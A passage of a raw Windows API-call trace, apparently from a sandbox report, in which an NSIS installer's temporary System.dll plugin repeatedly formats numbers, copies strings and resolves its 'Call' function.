(lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.047] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.047] lstrcpyA (in: lpString1=0x321ba8, lpString2="3314728" | out: lpString1="3314728") returned="3314728" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.047] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="380") returned 3 [0158.048] lstrcpyA (in: lpString1=0x431800, lpString2="380" | out: lpString1="380") returned="380" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="492") returned 3 [0158.048] lstrcpyA (in: lpString1=0x430800, lpString2="492" | out: lpString1="492") returned="492" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="840") returned 3 [0158.048] lstrcpyA (in: lpString1=0x431000, lpString2="840" | out: lpString1="840") returned="840" [0158.048] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3314728") returned 7 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.049] lstrlenA (lpString="1224") returned 4 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="492", iMaxLength=1024 | out: lpString1="492") returned="492" [0158.049] lstrlenA (lpString="492") returned 3 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="840", iMaxLength=1024 | out: lpString1="840") returned="840" [0158.049] lstrlenA (lpString="840") returned 3 [0158.049] lstrcpynA (in: lpString1=0x40ac18, lpString2="840", iMaxLength=1024 | out: lpString1="840") returned="840" [0158.049] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.049] lstrcmpiA (lpString1="840", lpString2="0") returned 1 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3314728", iMaxLength=1024 | out: lpString1="3314728") returned="3314728" [0158.049] lstrlenA (lpString="3314728") returned 7 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="840", iMaxLength=1024 | out: lpString1="840") returned="840" [0158.049] lstrlenA (lpString="840") returned 3 [0158.049] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3315568") returned 7 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.049] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.049] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.049] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.049] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.049] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.049] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.050] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3315568", iMaxLength=1024 | out: lpString1="3315568") returned="3315568" [0158.050] lstrlenA (lpString="3315568") returned 7 [0158.050] lstrcpynA (in: lpString1=0x336d34, lpString2="*3315568(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3315568(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3315568(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.050] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.050] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.050] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.050] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.050] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.050] lstrcpyA (in: lpString1=0x321ba8, lpString2="3315568" | out: lpString1="3315568") returned="3315568" [0158.050] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.050] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.050] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.051] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="600") returned 3 [0158.051] lstrcpyA (in: lpString1=0x430800, lpString2="600" | out: lpString1="600") returned="600" [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.051] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="912") returned 3 [0158.052] lstrcpyA (in: lpString1=0x431000, lpString2="912" | out: lpString1="912") returned="912" [0158.052] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3315568") returned 7 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.052] lstrlenA (lpString="1224") returned 4 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="600", iMaxLength=1024 | out: lpString1="600") returned="600" [0158.052] lstrlenA (lpString="600") returned 3 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="912", iMaxLength=1024 | out: lpString1="912") returned="912" [0158.052] lstrlenA (lpString="912") returned 3 [0158.052] lstrcpynA (in: lpString1=0x40ac18, lpString2="912", iMaxLength=1024 | out: lpString1="912") returned="912" [0158.052] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.052] lstrcmpiA (lpString1="912", lpString2="0") returned 1 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3315568", iMaxLength=1024 | out: lpString1="3315568") returned="3315568" [0158.052] lstrlenA (lpString="3315568") returned 7 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="912", iMaxLength=1024 | out: lpString1="912") returned="912" [0158.052] lstrlenA (lpString="912") returned 3 [0158.052] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3316480") returned 7 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.052] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.052] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.052] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.052] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.053] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.053] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.053] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3316480", iMaxLength=1024 | out: lpString1="3316480") returned="3316480" [0158.053] lstrlenA (lpString="3316480") returned 7 [0158.053] lstrcpynA (in: lpString1=0x336d34, lpString2="*3316480(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3316480(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3316480(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.053] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.053] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.053] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.053] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.053] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.053] lstrcpyA (in: lpString1=0x321ba8, lpString2="3316480" | out: lpString1="3316480") returned="3316480" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.054] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.054] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.054] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="664") returned 3 [0158.054] lstrcpyA (in: lpString1=0x430800, lpString2="664" | out: lpString1="664") returned="664" [0158.054] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.055] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="720") returned 3 [0158.055] lstrcpyA (in: lpString1=0x431000, lpString2="720" | out: lpString1="720") returned="720" [0158.056] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3316480") returned 7 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.056] lstrlenA (lpString="1224") returned 4 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="664", iMaxLength=1024 | out: lpString1="664") returned="664" [0158.056] lstrlenA (lpString="664") returned 3 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="720", iMaxLength=1024 | out: lpString1="720") returned="720" [0158.056] lstrlenA (lpString="720") returned 3 [0158.056] lstrcpynA (in: lpString1=0x40ac18, lpString2="720", iMaxLength=1024 | out: lpString1="720") returned="720" [0158.056] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.056] lstrcmpiA (lpString1="720", lpString2="0") returned 1 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3316480", iMaxLength=1024 | out: lpString1="3316480") returned="3316480" [0158.056] lstrlenA (lpString="3316480") returned 7 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="720", iMaxLength=1024 | out: lpString1="720") returned="720" [0158.056] lstrlenA (lpString="720") returned 3 [0158.056] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3317200") returned 7 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.056] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.056] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.056] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.056] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.057] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.057] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.057] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3317200", iMaxLength=1024 | out: lpString1="3317200") returned="3317200" [0158.057] lstrlenA (lpString="3317200") returned 7 [0158.057] lstrcpynA (in: lpString1=0x336d34, lpString2="*3317200(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3317200(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3317200(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.057] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.057] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.057] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.057] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.057] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.057] lstrcpyA (in: lpString1=0x321ba8, lpString2="3317200" | out: lpString1="3317200") returned="3317200" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.058] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="476") returned 3 [0158.058] lstrcpyA (in: lpString1=0x431800, lpString2="476" | out: lpString1="476") returned="476" [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="716") returned 3 [0158.059] lstrcpyA (in: lpString1=0x430800, lpString2="716" | out: lpString1="716") returned="716" [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="1616") returned 4 [0158.059] lstrcpyA (in: lpString1=0x431000, lpString2="1616" | out: lpString1="1616") returned="1616" [0158.059] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3317200") returned 7 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.059] lstrlenA (lpString="1224") returned 4 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="716", iMaxLength=1024 | out: lpString1="716") returned="716" [0158.059] lstrlenA (lpString="716") returned 3 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1616", iMaxLength=1024 | out: lpString1="1616") returned="1616" [0158.059] lstrlenA (lpString="1616") returned 4 [0158.059] lstrcpynA (in: lpString1=0x40ac18, lpString2="1616", iMaxLength=1024 | out: lpString1="1616") returned="1616" [0158.059] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.059] lstrcmpiA (lpString1="1616", lpString2="0") returned 1 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3317200", iMaxLength=1024 | out: lpString1="3317200") returned="3317200" [0158.059] lstrlenA (lpString="3317200") returned 7 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1616", iMaxLength=1024 | out: lpString1="1616") returned="1616" [0158.059] lstrlenA (lpString="1616") returned 4 [0158.059] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3318816") returned 7 [0158.059] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.060] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.060] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.060] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 